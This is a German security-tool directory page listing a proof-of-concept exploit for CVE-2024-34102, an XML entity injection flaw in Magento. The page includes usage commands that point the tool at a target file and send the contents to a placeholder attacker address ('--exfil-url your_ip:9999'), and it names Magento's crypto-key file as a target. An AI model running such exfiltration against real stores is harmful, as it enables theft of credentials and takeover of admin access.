Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-34102 — Eine PoC-Demonstration , kritische XML-Entity-Injection-Sicherheitslücke in Magento | Kitploit
Tools/GitHubGitHub/d0rb/cve-2024-34102
SchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsLernen & Bildung
GitHubd0rb/cve-2024-34102

CVE-2024-34102

Eine PoC-Demonstration , kritische XML-Entity-Injection-Sicherheitslücke in Magento

Repository anzeigen
2vor 2 JahrenNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

🇮🇱 #BringThemHome #NeverAgainIsNow 🇮🇱

Wir fordern die sichere Rückkehr aller Bürger, die von der terroristischen Gruppe Hamas als Geiseln genommen wurden. Wir werden nicht ruhen, bis jede Geisel freigelassen ist und sicher nach Hause zurückkehrt. Sie können helfen, sie nach Hause zu bringen. https://stories.bringthemhomenow.net/

CVE-2024-34102 PoC 🚀

Dieses Repository enthält einen Proof-of-Concept (PoC) Exploit für die kritische XML-Entity-Injection-Schwachstelle (CVE-2024-34102) in Magento. Diese Schwachstelle ermöglicht die Exfiltration sensibler Dateien, die dann genutzt werden können, um unbefugten Zugriff auf die administrativen Funktionen von Magento zu erlangen. Dieser Exploit ist für Bildungszwecke gedacht und sollte verantwortungsvoll eingesetzt werden.

Übersicht 📖

Magento ist eine der weltweit am häufigsten genutzten E-Commerce-Lösungen. Im Juni 2024 wurde eine kritische Pre-Authentication-XML-Entity-Injection entdeckt, die als CVE-2024-34102 identifiziert wurde. Diese Schwachstelle kann schwerwiegende Folgen haben, darunter die Exfiltration der Datei app/etc/env.php aus Magento, die kryptografische Schlüssel zum Signieren von JWTs enthält.

Funktionen 🌟

  • Exfiltration sensibler Dateien von einer verwundbaren Magento-Instanz.
  • Einfache und unkomplizierte Nutzung.
  • Bildungsbezogene Demonstration von XML-Entity-Injection.

Verwendung 🚀

Voraussetzungen

  • Python 3.x
  • requests-Bibliothek (pip install requests)

Ausführen des Exploits

  1. Repository klonen:

    root@kitploit:~
    git clone https://github.com/yourusername/CVE-2024-34102-exploit.git
    cd CVE-2024-34102-exploit
    
  2. Skript mit den erforderlichen Argumenten ausführen:

    root@kitploit:~
    python cve_2024_34102_exploit.py --target-url http://example.com --target-file /etc/hosts --exfil-url your_ip:9999
    

Befehlszeilenargumente

  • --target-url: Die URL der Ziel-Magento-Instanz.
  • --target-file: Der Dateipfad auf dem Zielserver, der exfiltriert werden soll.
  • --exfil-url: Die URL zum Empfang der exfiltrierten Daten.

Beispiel 🌐

root@kitploit:~
python cve_2024_34102_exploit.py --target-url http://example.com --target-file /etc/hosts --exfil-url your_ip:9999
Tool herunterladen